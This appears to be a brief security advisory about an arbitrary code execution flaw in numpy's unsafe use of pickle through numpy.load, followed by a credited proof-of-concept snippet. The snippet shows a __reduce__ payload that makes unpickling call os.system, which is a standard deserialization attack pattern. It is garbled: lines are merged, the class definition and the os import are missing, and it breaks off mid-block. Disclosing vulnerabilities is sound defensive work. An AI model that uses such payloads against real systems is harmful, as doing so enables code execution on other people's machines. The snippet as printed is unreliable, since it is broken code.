numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Arbitrary Code Execution.
It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.
PoC by nanshihui:
from numpy import __version__
self.a = 1def__reduce__(self):return (os.system,('ls',))
tmpdaa = Test()
with open("a-file.pickle",'wb') as f: